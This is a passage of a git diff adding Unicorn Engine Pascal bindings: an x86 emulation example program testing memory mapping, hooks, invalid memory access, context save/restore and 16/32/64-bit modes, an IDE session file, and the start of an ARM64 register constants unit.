[0x%x] = 0x%x', [ADDRESS, tmp])); + end else begin + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); + end; + + Freemem(mem,2 * 1024 * 1024); + uc_close(uc); +end; + +procedure TestI386Jump; +var + uc: uc_engine; + err: uc_err; + trace1, trace2: uc_hook; +begin + WriteLn('==================================='); + WriteLn('Emulate i386 code with jump'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this 
emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JUMP, SizeOf(X86_CODE32_JUMP) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // tracing 1 basic block with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, ADDRESS, ADDRESS,[]); + + // tracing 1 instruction at ADDRESS + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, ADDRESS, ADDRESS,[]); + + // emulate machine code in infinite time + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JUMP) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + WriteLn('>>> Emulation done.'); + uc_close(uc); +end; + +procedure TestI386Loop; +var + uc: uc_engine; + err: uc_err; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that loop forever'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_LOOP, SizeOf(X86_CODE32_LOOP) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // emulate machine code in 2 seconds, so we can quit even + // if the code loops + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_LOOP) - 1, 2 * UC_SECOND_SCALE, 0); + if 
(err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure TestI386InvalidMemRead; +var + uc: uc_engine; + err: uc_err; + trace1, trace2: uc_hook; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that read from invalid memory'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_READ, SizeOf(X86_CODE32_MEM_READ) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + uc_close(uc); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_READ) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. 
Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure TestI386InvalidMemWrite; +var + uc: uc_engine; + err: uc_err; + trace1, trace2, trace3: uc_hook; + r_ecx, r_edx: integer; + tmp: UInt32; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that write to invalid memory'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_WRITE, SizeOf(X86_CODE32_MEM_WRITE) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // intercept invalid memory events + uc_hook_add(uc, trace3, UC_HOOK_MEM_READ_UNMAPPED or UC_HOOK_MEM_WRITE_UNMAPPED, @HookMemInvalid, nil,1,0,[]); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_WRITE) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. 
Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + // read from memory + err := uc_mem_read_(uc, $aaaaaaaa, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then + WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$aaaaaaaa, tmp])) + else + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$aaaaaaaa])); + + err := uc_mem_read_(uc, $ffffffaa, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then + WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$ffffffaa, tmp])) + else + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$ffffffaa])); + + uc_close(uc); +end; + +procedure TestI386JumpInvalid; +var + uc: uc_engine; + err: uc_err; + trace1, trace2: uc_hook; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that jumps to invalid memory'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JMP_INVALID, SizeOf(X86_CODE32_JMP_INVALID) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + uc_close(uc); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + 
err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JMP_INVALID) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure TestI386Inout; +var + uc: uc_engine; + err: uc_err; + trace1, trace2, trace3, trace4: uc_hook; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code with IN/OUT instructions'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INOUT, SizeOf(X86_CODE32_INOUT) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // uc IN instruction + uc_hook_add(uc, trace3, UC_HOOK_INSN, @HookIn, nil, 1,0,[UC_X86_INS_IN]); + // uc OUT instruction + uc_hook_add(uc, trace4, UC_HOOK_INSN, @HookOut, nil, 1,0,[UC_X86_INS_OUT]); + + err := uc_emu_start(uc, ADDRESS, 
ADDRESS + SizeOf(X86_CODE32_INOUT) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure test_i386_context_save(); +var + uc: uc_engine; + context : uc_context; + err: uc_err; + r_eax : integer; +begin + r_eax := 1; // EAX register + WriteLn('==================================='); + WriteLn('Emulate i386 code - Save/restore CPU context in opaque blob'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + uc_mem_map(uc,ADDRESS,8 * 1024 , UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INC, SizeOf(X86_CODE32_INC) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + uc_close(uc); + Exit; + end; + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, @r_eax); + + // emulate machine code in infinite time + writeln('>>> Running emulation for the first time'); + err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + Writeln('>>> Emulation done. 
Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); + WriteLn(Format('>>> EAX = 0x%x', [r_eax])); + + Writeln('>>> Saving CPU context'); + + err := uc_context_alloc(uc,context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_context_alloc() with error returned %u : %s', [err, uc_strerror(err)])); + exit; + end; + + err := uc_context_save(uc, context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_context_save() with error returned %u : %s', [err, uc_strerror(err)])); + exit; + end; + + Writeln('>>> Running emulation for the second time'); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + Writeln('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); + WriteLn(Format('>>> EAX = 0x%x', [r_eax])); + + err := uc_context_restore(uc, context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_context_restore() with error returned %u: %s', [err, uc_strerror(err)])); + exit; + end; + + Writeln('>>> CPU context restored. 
Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); + WriteLn(Format('>>> EAX = 0x%x', [r_eax])); + + err := uc_free(context); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_free() with error returned %u: %s', [err, uc_strerror(err)])); + exit; + end; + + uc_close(uc); +end; + +procedure TestX86_64; +var + uc: uc_engine; + err: uc_err; + trace1, trace2, trace3, trace4: uc_hook; + rax, rbx, rcx, rdx, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15, rsp: UInt64; +begin + rax := $71f3029efd49d41d; + rbx := $d87b45277f133ddb; + rcx := $ab40d1ffd8afc461; + rdx := $919317b4a733f01; + rsi := $4c24e753a17ea358; + rdi := $e509a57d2571ce96; + r8 := $ea5b108cc2b9ab1f; + r9 := $19ec097c8eb618c1; + r10 := $ec45774f00c5f682; + r11 := $e17e9dbec8c074aa; + r12 := $80f86a8dc0f6d457; + r13 := $48288ca5671c5492; + r14 := $595f72f6e4017f6e; + r15 := $1efd97aea331cccc; + + rsp := ADDRESS + $200000; + + WriteLn('Emulate x86_64 code'); + + // Initialize emulator in X86-64bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE64, SizeOf(X86_CODE64) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_RSP, @rsp); + + uc_reg_write(uc, UC_X86_REG_RAX, @rax); + uc_reg_write(uc, UC_X86_REG_RBX, @rbx); + uc_reg_write(uc, UC_X86_REG_RCX, @rcx); + uc_reg_write(uc, UC_X86_REG_RDX, @rdx); + uc_reg_write(uc, UC_X86_REG_RSI, @rsi); + uc_reg_write(uc, UC_X86_REG_RDI, @rdi); + uc_reg_write(uc, UC_X86_REG_R8, @r8); + uc_reg_write(uc, UC_X86_REG_R9, @r9); + uc_reg_write(uc, UC_X86_REG_R10, @r10); + uc_reg_write(uc, UC_X86_REG_R11, @r11); + 
uc_reg_write(uc, UC_X86_REG_R12, @r12); + uc_reg_write(uc, UC_X86_REG_R13, @r13); + uc_reg_write(uc, UC_X86_REG_R14, @r14); + uc_reg_write(uc, UC_X86_REG_R15, @r15); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode64, nil, ADDRESS, ADDRESS + 20,[]); + + // tracing all memory WRITE access (with @begin > @end) + uc_hook_add(uc, trace3, UC_HOOK_MEM_WRITE, @HookMem64, nil, 1, 0,[]); + // tracing all memory READ access (with @begin > @end) + uc_hook_add(uc, trace4, UC_HOOK_MEM_READ, @HookMem64, nil, 1, 0,[]); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_RAX, @rax); + uc_reg_read(uc, UC_X86_REG_RBX, @rbx); + uc_reg_read(uc, UC_X86_REG_RCX, @rcx); + uc_reg_read(uc, UC_X86_REG_RDX, @rdx); + uc_reg_read(uc, UC_X86_REG_RSI, @rsi); + uc_reg_read(uc, UC_X86_REG_RDI, @rdi); + uc_reg_read(uc, UC_X86_REG_R8, @r8); + uc_reg_read(uc, UC_X86_REG_R9, @r9); + uc_reg_read(uc, UC_X86_REG_R10, @r10); + uc_reg_read(uc, UC_X86_REG_R11, @r11); + uc_reg_read(uc, UC_X86_REG_R12, @r12); + uc_reg_read(uc, UC_X86_REG_R13, @r13); + uc_reg_read(uc, UC_X86_REG_R14, @r14); + uc_reg_read(uc, UC_X86_REG_R15, @r15); + + WriteLn(Format('>>> RAX = 0x%.16x', [rax])); + WriteLn(Format('>>> RBX = 0x%.16x', [rbx])); + WriteLn(Format('>>> RCX = 0x%.16x', [rcx])); + WriteLn(Format('>>> RDX = 0x%.16x', [rdx])); + WriteLn(Format('>>> RSI = 0x%.16x', [rsi])); + WriteLn(Format('>>> RDI = 0x%.16x', [rdi])); + WriteLn(Format('>>> R8 = 0x%.16x', [r8])); + WriteLn(Format('>>> R9 = 0x%.16x', [r9])); + WriteLn(Format('>>> R10 = 0x%.16x', [r10])); + 
WriteLn(Format('>>> R11 = 0x%.16x', [r11])); + WriteLn(Format('>>> R12 = 0x%.16x', [r12])); + WriteLn(Format('>>> R13 = 0x%.16x', [r13])); + WriteLn(Format('>>> R14 = 0x%.16x', [r14])); + WriteLn(Format('>>> R15 = 0x%.16x', [r15])); + + uc_close(uc); +end; + +procedure TestX86_64Syscall; +var + uc: uc_engine; + err: uc_err; + trace1: uc_hook; + rax: UInt64; +begin + rax := $100; + WriteLn('==================================='); + WriteLn('Emulate x86_64 code with "syscall" instruction'); + + // Initialize emulator in X86-64bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE64_SYSCALL, SizeOf(X86_CODE64_SYSCALL) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // hook interrupts for syscall + uc_hook_add(uc, trace1, UC_HOOK_INSN, @HookSyscall, nil, 1 , 0 , [UC_X86_INS_SYSCALL]); + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_RAX, @rax); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64_SYSCALL) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. 
Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_RAX, @rax); + WriteLn(Format('>>> RAX = 0x%x', [rax])); + + uc_close(uc); +end; + +procedure TestX86_16; +var + uc: uc_engine; + err: uc_err; + tmp: Word; + eax, ebx, esi: UInt32; +begin + eax := 7; + ebx := 5; + esi := 6; + + WriteLn('Emulate x86 16-bit code'); + + // Initialize emulator in X86-16bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_16, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 8KB memory for this emulation + uc_mem_map(uc, 0, 8 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, 0, @X86_CODE16, SizeOf(X86_CODE16) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, @eax); + uc_reg_write(uc, UC_X86_REG_EBX, @ebx); + uc_reg_write(uc, UC_X86_REG_ESI, @esi); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + err := uc_emu_start(uc, 0, SizeOf(X86_CODE16) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. 
Below is the CPU context'); + + err := uc_mem_read_(uc, 11, @tmp, 1); + if (err = UC_ERR_OK) then + WriteLn(Format('>>> Read 1 bytes from [0x%x] = 0x%x', [11, tmp])) + else + WriteLn(Format('>>> Failed to read 1 bytes from [0x%x]', [11])); + + uc_close(uc); +end; + +begin + if ParamCount > 0 then begin + if (ParamStr(1) = '-32') then begin + TestI386; + test_i386_map_ptr; + test_i386_context_save; + TestI386Inout; + TestI386Jump; + TestI386Loop; + TestI386InvalidMemRead; + TestI386InvalidMemWrite; + TestI386JumpInvalid; + end; + + if (ParamStr(1) = '-64') then begin + TestX86_64; + TestX86_64Syscall; + end; + + if (ParamStr(1) = '-16') then begin + TestX86_16; + end; + + end else + WriteLn(#10'Syntax: SampleX86 <-16|-32|-64>'#10); +end. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lps b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lps new file mode 100644 index 0000000..8ea924e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lps @@ -0,0 +1,197 @@ +<?xml version="1.0" encoding="UTF-8"?> +<CONFIG> + <ProjectSession> + <Version Value="10"/> + <BuildModes Active="Debug"/> + <Units Count="10"> + <Unit0> + <Filename Value="x86.lpr"/> + <IsPartOfProject Value="True"/> + <TopLine Value="8"/> + <CursorPos X="34" Y="4"/> + <UsageCount Value="21"/> + <Loaded Value="True"/> + </Unit0> + <Unit1> + <Filename Value="../unicorn/UnicornConst.pas"/> + <EditorIndex Value="-1"/> + <CursorPos X="25" Y="2"/> + <UsageCount Value="10"/> + </Unit1> + <Unit2> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <IsVisibleTab Value="True"/> + <EditorIndex Value="1"/> + <CursorPos X="80" Y="3"/> + <UsageCount Value="10"/> + <Loaded Value="True"/> + </Unit2> + <Unit3> + <Filename Value="/usr/local/share/fpcsrc/rtl/objpas/sysutils/sysstrh.inc"/> + <EditorIndex Value="-1"/> + <TopLine Value="71"/> + <CursorPos X="25" Y="77"/> + <UsageCount Value="10"/> + </Unit3> + <Unit4> + <Filename 
Value="/usr/local/share/fpcsrc/rtl/inc/systemh.inc"/> + <EditorIndex Value="-1"/> + <TopLine Value="331"/> + <CursorPos X="3" Y="339"/> + <UsageCount Value="10"/> + </Unit4> + <Unit5> + <Filename Value="/usr/local/share/fpcsrc/packages/rtl-console/src/unix/crt.pp"/> + <UnitName Value="Crt"/> + <EditorIndex Value="-1"/> + <TopLine Value="1104"/> + <CursorPos X="7" Y="534"/> + <UsageCount Value="10"/> + </Unit5> + <Unit6> + <Filename Value="/usr/local/share/fpcsrc/packages/rtl-console/src/inc/crth.inc"/> + <EditorIndex Value="-1"/> + <TopLine Value="31"/> + <CursorPos X="11" Y="44"/> + <UsageCount Value="10"/> + </Unit6> + <Unit7> + <Filename Value="/usr/local/share/fpcsrc/rtl/darwin/termio.pp"/> + <EditorIndex Value="-1"/> + <TopLine Value="24"/> + <UsageCount Value="10"/> + </Unit7> + <Unit8> + <Filename Value="../unicorn/X86Const.pas"/> + <EditorIndex Value="-1"/> + <CursorPos X="57"/> + <UsageCount Value="10"/> + </Unit8> + <Unit9> + <Filename Value="/usr/local/share/fpcsrc/rtl/inc/dynlibs.pas"/> + <EditorIndex Value="-1"/> + <TopLine Value="46"/> + <CursorPos X="25" Y="53"/> + <UsageCount Value="10"/> + </Unit9> + </Units> + <JumpHistory Count="26" HistoryIndex="25"> + <Position1> + <Filename Value="x86.lpr"/> + <Caret Line="332" TopLine="323"/> + </Position1> + <Position2> + <Filename Value="x86.lpr"/> + <Caret Line="333" TopLine="323"/> + </Position2> + <Position3> + <Filename Value="x86.lpr"/> + <Caret Line="338" TopLine="331"/> + </Position3> + <Position4> + <Filename Value="x86.lpr"/> + <Caret Line="340" Column="42" TopLine="330"/> + </Position4> + <Position5> + <Filename Value="x86.lpr"/> + <Caret Line="339" Column="29" TopLine="335"/> + </Position5> + <Position6> + <Filename Value="x86.lpr"/> + <Caret Line="684" Column="42" TopLine="507"/> + </Position6> + <Position7> + <Filename Value="x86.lpr"/> + <Caret Line="51" Column="73" TopLine="43"/> + </Position7> + <Position8> + <Filename Value="x86.lpr"/> + <Caret Line="32" Column="16" TopLine="27"/> + 
</Position8> + <Position9> + <Filename Value="x86.lpr"/> + <Caret Line="895" Column="18" TopLine="889"/> + </Position9> + <Position10> + <Filename Value="x86.lpr"/> + <Caret Line="894" Column="6" TopLine="889"/> + </Position10> + <Position11> + <Filename Value="x86.lpr"/> + <Caret Line="52" Column="73" TopLine="44"/> + </Position11> + <Position12> + <Filename Value="x86.lpr"/> + <Caret Line="279" TopLine="268"/> + </Position12> + <Position13> + <Filename Value="x86.lpr"/> + <Caret Line="280" Column="26" TopLine="272"/> + </Position13> + <Position14> + <Filename Value="x86.lpr"/> + <Caret Line="898" Column="16" TopLine="883"/> + </Position14> + <Position15> + <Filename Value="x86.lpr"/> + <Caret Line="889" Column="40" TopLine="879"/> + </Position15> + <Position16> + <Filename Value="x86.lpr"/> + <Caret Line="447" Column="44" TopLine="440"/> + </Position16> + <Position17> + <Filename Value="x86.lpr"/> + <Caret Line="894" Column="12" TopLine="887"/> + </Position17> + <Position18> + <Filename Value="x86.lpr"/> + <Caret Line="255" Column="28" TopLine="247"/> + </Position18> + <Position19> + <Filename Value="x86.lpr"/> + <Caret Line="984" Column="8" TopLine="973"/> + </Position19> + <Position20> + <Filename Value="x86.lpr"/> + <Caret Line="987" Column="9" TopLine="976"/> + </Position20> + <Position21> + <Filename Value="x86.lpr"/> + <Caret Line="22" Column="15" TopLine="17"/> + </Position21> + <Position22> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="128" Column="37" TopLine="119"/> + </Position22> + <Position23> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="600" TopLine="597"/> + </Position23> + <Position24> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="9" Column="3" TopLine="8"/> + </Position24> + <Position25> + <Filename Value="../unicorn/Unicorn_dyn.pas"/> + <Caret Line="640" Column="15" TopLine="632"/> + </Position25> + <Position26> + <Filename Value="x86.lpr"/> + <Caret Line="989" Column="132" TopLine="6"/> + 
</Position26> + </JumpHistory> + </ProjectSession> + <Debugging> + <Watches Count="2"> + <Item1> + <Expression Value="mem"/> + <DisplayStyle Value="wdfPointer"/> + </Item1> + <Item2> + <Expression Value="X86_CODE32"/> + <DisplayStyle Value="wdfMemDump"/> + </Item2> + </Watches> + </Debugging> +</CONFIG> diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Arm64Const.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Arm64Const.pas new file mode 100644 index 0000000..d348039 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Arm64Const.pas @@ -0,0 +1,319 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit Arm64Const; + +interface + +const +// ARM64 registers + + UC_ARM64_REG_INVALID = 0; + UC_ARM64_REG_X29 = 1; + UC_ARM64_REG_X30 = 2; + UC_ARM64_REG_NZCV = 3; + UC_ARM64_REG_SP = 4; + UC_ARM64_REG_WSP = 5; + UC_ARM64_REG_WZR = 6; + UC_ARM64_REG_XZR = 7; + UC_ARM64_REG_B0 = 8; + UC_ARM64_REG_B1 = 9; + UC_ARM64_REG_B2 = 10; + UC_ARM64_REG_B3 = 11; + UC_ARM64_REG_B4 = 12; 